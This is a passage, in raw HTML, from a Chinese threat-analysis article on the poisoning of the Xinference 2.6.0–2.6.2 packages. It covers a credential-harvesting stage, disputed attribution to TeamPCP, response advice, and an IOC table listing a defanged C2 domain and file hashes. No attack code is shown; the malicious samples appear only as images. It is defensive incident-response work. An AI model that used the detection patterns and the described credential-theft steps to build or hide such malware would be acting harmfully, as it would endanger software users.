leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">系统账户与登录痕迹搜集：收集用户清单、密码哈希与登录成功记录。</span></span><o:page></o:page></p></li></ul><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5444856348470807" data-w="2158" style="width: 553.74px;height: 301.47px;" src="https://wechat2rss.xlab.app/img-proxy/?k=d020919f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJ5srYmWFb3Bibrf0oJ36Via2YuGzSfibG8kekMeS3QaRkcVx3bTmuRV9HAlaPCcTqiaicPeSGAOrKRnIwEIhHHTD7cyk2JarmbC4g0%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt81fxa"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;">图6 阶段2恶意代码示例</span></span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="mogma5r7l7m"><div data-mpa-template="t" mpa-from-tpl="t"><div style="display: flex;align-items: center;justify-content: center;" data-mid="" mpa-from-tpl="t"><div style="display: flex;flex-direction: column;justify-content: center;align-items: center;" data-mid="" mpa-from-tpl="t"><p style="color: #B5230B;padding: 0 8px;text-align: justify;font-family: &#34;PingFang SC&#34;;font-size: 22px;font-style: normal;font-weight: 600;line-height: 44px;letter-spacing: 1.32px;border-radius: 6px;background: #FFEAAE;" data-mid="" mpa-from-tpl="t" mpa-none-content="t"><span leaf="" mpa-font-style="mogmaj5q13gk" style="font-size: 18px;" data-mpa-action-id="mogmaj662c7" data-pm-slice="0 0 []">02</span></p><p style="width: 36px;margin-top: 8px;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.25675675675675674" data-w="74" style="display: block;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=c92a70d5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FpALNiaJfvo0JYIUacERibiaqVWp28U3y2T3pVQNg7t7fEmUkOHj1MRKlht1cQBpzoSMKK3u5nXvl8qPEuRpWiacWy3I0B66bn686GQq5SD0coCs%2F640%3Ffrom%3Dappmsg"/></p></div><div style="display: flex;justify-content: flex-end;align-items: end;margin-top: -5px;padding-bottom: 8px;border-bottom: 1px solid #B5230B;" data-mid="" mpa-from-tpl="t"><div style="width: fit-content;color: #FFF;text-align: justify;font-family: &#34;PingFang SC&#34;;font-size: 18px;font-style: normal;font-weight: 600;line-height: 36px;letter-spacing: 1.08px;border-radius: 4px;background: #B5230B;padding: 2px 16px;margin-left: 8px;margin-right: 19px;" data-mid="" mpa-from-tpl="t" yb-mpa-mark="mark-style-text"><p data-mid="" mpa-from-tpl="t"><span leaf="" mpa-is-content="t" mpa-font-style="mogmambr1b28" style="font-size: 18px;" data-mpa-action-id="mogmamc41adw" data-pm-slice="0 0 []">归属研判</span></p></div><p data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.8367346938775511" data-w="49" style="width: 20px;transform: translateY(-2px);display: block;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=017f44fe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FF9Qia9yBKiatjeBG0kXBR5Cd9AyUcayibLOPlp9iaY6YeUYBoLZcTaxbd1AyxyefO5x7GCicw0ESwHZRJ1mVib8hic1X63a7fhsibcGicibhgNOT8SMbM%2F640%3Ffrom%3Dappmsg"/></p></div></div></div></div><p style="text-indent: 2em;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt81tsl">在第一阶段样本中，攻击者留有明确的文本标记 &#34;# hacked by teampcp&#34;，从字面上看，该标记指向近期活跃于开源供应链攻击领域的 TeamPCP 组织。</span></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.27768456375838924" data-w="1192" style="width: 553.74px;height: 153.74px;" src="https://wechat2rss.xlab.app/img-proxy/?k=491c090c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLKvVKfCfu7vuvvaAlicRMavic4JPj4xUQupaQMh9xrC805Le8TKicLKJYVostsNJo0OItoqXWw2VBLjWmEIPREyahc6bbrrlPOoA%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt8li5"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;">图7 阶段1恶意代码文本标记</span></span></p><p style="text-indent: 2em;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt81ky8">TeamPCP 是一个高级威胁组织，近期发起了一系列精心策划的供应链攻击。该组织通过攻陷 Trivy、KICS 和 LiteLLM 等主流开源工具，隐蔽植入了用于窃取凭证的恶意软件。为规避安全检测，他们综合采用了凭证收集、Kubernetes 环境内的横向移动以及音频隐写等复杂攻击技术。此外，该组织还具备极强的跨平台感染能力，能够利用窃取到的凭证，借助名为“CanisterWorm”的自传播蠕虫病毒，将攻击范围横向扩展至 npm 和 PyPI 等多个软件生态系统。在数据窃取阶段，他们使用了 AES-256 和 RSA-4096 高强度加密技术来向外传输敏感数据。</span><o:page></o:page></p><p style="text-indent: 2em;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt81pz7">然而，此次事件的归属研判存在一定争议。2026年4月22日，TeamPCP 组织通过社交平台公开否认参与此次 Xinference 投毒事件，声称系他人冒用 TeamPCP 名义实施。</span></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.20689655172413793" data-w="1247" style="width: 553.74px;height: 114.54px;" src="https://wechat2rss.xlab.app/img-proxy/?k=4798b2e8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXL80KkUAxL0nzq8znRfriaG3vklnHfpL6Tt8ZrcGxRQSsTCoViayHuPIRicyuAUeJMhqrcNGTD1BFYPIzXjibdBzww1lYRX6HwqFD0%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;">图8 TeamPCP否认此次攻击</span></span></p><p style="text-indent: 2em;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt85j2">结合历史样本进行横向对比，我们注意到在此前已确认由 TeamPCP 发起的 LiteLLM 和 Telnyx 供应链投毒事件中，恶意代码顶部并未出现类似的文字标记。这一差异点值得关注。</span><o:page></o:page></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;"><img class="rich_pages wxw-img" data-aistatus="1" data-ratio="0.4015503875968992" style="width: 553.74px;height: 222.34px;" data-w="1290" src="https://wechat2rss.xlab.app/img-proxy/?k=f3c5217a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJLNGSkwCOny8nxxXRduIOnJMcUicyc2Il89KrI8nbhamlDPHVqic8IozkmenGGUvMoqiatdXHwX49H4wmd41hsmVZqBq2RYdgjZE%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></span></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;">图9 LiteLLM 和 Telnyx事件中恶意代码示例</span></span></p><p style="text-indent: 2em;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt81jvj">综合以上分析，目前尚无法仅凭代码中的文本标记将此次 Xinference 事件确定性归属于 TeamPCP 组织。该标记既可能是攻击者的真实署名，也可能是第三方蓄意嫁祸的假旗手段。我们将持续关注此事件的后续发展，并在获得更多关联证据后更新归属研判结论。</span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="mogmaslj1m3g"><div data-mpa-template="t" mpa-from-tpl="t"><div style="display: flex;align-items: center;justify-content: center;" data-mid="" mpa-from-tpl="t"><div style="display: flex;flex-direction: column;justify-content: center;align-items: center;" data-mid="" mpa-from-tpl="t"><p style="color: #B5230B;padding: 0 8px;text-align: justify;font-family: &#34;PingFang SC&#34;;font-size: 22px;font-style: normal;font-weight: 600;line-height: 44px;letter-spacing: 1.32px;border-radius: 6px;background: #FFEAAE;" data-mid="" mpa-from-tpl="t" mpa-none-content="t"><span leaf="" mpa-font-style="mogmb0cd1wu6" style="font-size: 18px;" data-mpa-action-id="mogmb0cwqqu" data-pm-slice="0 0 []">03</span></p><p style="width: 36px;margin-top: 8px;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.25675675675675674" data-w="74" style="display: block;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=c92a70d5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FpALNiaJfvo0JYIUacERibiaqVWp28U3y2T3pVQNg7t7fEmUkOHj1MRKlht1cQBpzoSMKK3u5nXvl8qPEuRpWiacWy3I0B66bn686GQq5SD0coCs%2F640%3Ffrom%3Dappmsg"/></p></div><div style="display: flex;justify-content: flex-end;align-items: end;margin-top: -5px;padding-bottom: 8px;border-bottom: 1px solid #B5230B;" data-mid="" mpa-from-tpl="t"><div style="width: fit-content;color: #FFF;text-align: justify;font-family: &#34;PingFang SC&#34;;font-size: 18px;font-style: normal;font-weight: 600;line-height: 36px;letter-spacing: 1.08px;border-radius: 4px;background: #B5230B;padding: 2px 16px;margin-left: 8px;margin-right: 19px;" data-mid="" mpa-from-tpl="t" yb-mpa-mark="mark-style-text"><p data-mid="" mpa-from-tpl="t"><span leaf="" mpa-is-content="t">防范排查建议</span></p></div><p data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.8367346938775511" data-w="49" style="width: 20px;transform: translateY(-2px);display: block;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=017f44fe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FF9Qia9yBKiatjeBG0kXBR5Cd9AyUcayibLOPlp9iaY6YeUYBoLZcTaxbd1AyxyefO5x7GCicw0ESwHZRJ1mVib8hic1X63a7fhsibcGicibhgNOT8SMbM%2F640%3Ffrom%3Dappmsg"/></p></div></div></div></div><p style="text-indent: 2em;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt81kzi">如果您受到影响，请您：</span></p><ol style="list-style-type: decimal;" class="list-paddingleft-1"><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span mpa-font-style="moglxmt8bfg" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">立刻隔离受影响资产</span>：对安装过受影响版本（2.6.0/2.6.1/2.6.2）的主机、容器、CI 节点执行网络隔离，优先阻断到可疑域名与外连通道。</span></span></p></li><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span mpa-font-style="moglxmt87ib" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">紧急下线受污染版本</span>：卸载受影响包并清理缓存镜像，禁止继续使用受影响版本。</span></span></p></li><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span mpa-font-style="moglxmt8pv" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">强制轮换所有高价值凭证</span>：包括云账号 AK/SK、K8s Token、仓库访问令牌、数据库口令、Webhook、VPN 与证书私钥。</span></span><o:page></o:page></p></li><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span mpa-font-style="moglxmt81yox" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">检查 __init__.py 是否存在异常 Base64 长字符串、可疑执行链</span>（如 exec()、subprocess.Popen()、subprocess.run()）。</span></span></p></li><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span mpa-font-style="moglxmt81y0" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">搜索攻击者标记与阶段特征</span>：# hacked by teampcp、X-QT-SR、whereisitat.lucyatemysuperbox[.]space。</span></span></p></li><li><p style="text-indent: 0px;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span mpa-font-style="moglxmt820c4" style="font-size: 17px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">查找可疑中间文件或压缩产物</span>（例如 love.tar.gz、临时文件 f）。</span></span></p></li></ol><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="moglyt11w86"><div data-mpa-template="t" mpa-from-tpl="t"><div data-role="outer" label="edit by 135editor" mpa-from-tpl="t"><div data-role="title" data-tools="135编辑器" data-id="85638" mpa-from-tpl="t"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-image: initial;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);" mpa-from-tpl="t"><p style="margin-top: -1.2em;text-align: center;border: none;line-height: 1.4;" mpa-from-tpl="t"><strong mpa-from-tpl="t"><span style="background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">附录 IOC</span></span></strong></p></div></div></div></div></div><div><div><div><p><table style="width: 574px;"><tbody><tr><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf=""><span textstyle="" style="font-weight: bold;">IOC</span></span></span></span></p></td><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf=""><span textstyle="" style="font-weight: bold;">说明</span></span></span></span></p></td></tr><tr><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">whereisitat.lucyatemysuperbox[.]space</span></span></span></p></td><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">C2</span></span></span></p></td></tr><tr><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span lang="EN-US" style="color: rgb(30, 41, 59);background: white;" data-pm-slice="0 0 []"><span leaf="">971670c10eff28339a085ca50a600e35</span></span></span></span></p></td><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span lang="EN-US" style="color: rgb(30, 41, 59);background: white;" data-pm-slice="0 0 []"><span leaf="">xinference-2.6.0.tar.gz</span></span></span></span></p></td></tr><tr><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span lang="EN-US" style="color: rgb(30, 41, 59);background: white;" data-pm-slice="0 0 []"><span leaf="">9b3257e45b27a6bbe4e240e41a3a306f</span></span></span></span></p></td><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span lang="EN-US" style="color: rgb(30, 41, 59);background: white;" data-pm-slice="0 0 []"><span leaf="">xinference-2.6.1.tar.gz</span></span></span></span></p></td></tr><tr><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span lang="EN-US" style="color: rgb(30, 41, 59);background: white;" data-pm-slice="0 0 []"><span leaf="">484067fd6232f7cdd7b664b33857fc2c</span></span></span></span></p></td><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span lang="EN-US" style="color: rgb(30, 41, 59);background: white;" data-pm-slice="0 0 []"><span leaf="">xinference-2.6.2.tar.gz</span></span></span></span></p></td></tr><tr><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">8673c50ccff8e2acc8d3c31463c36490</span></span></span></p></td><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">xinference-2.6.0/xinference/__init__.py</span></span></span></p></td></tr><tr><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">67de6bf436257442e95efa9fab159e10</span></span></span></p></td><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang 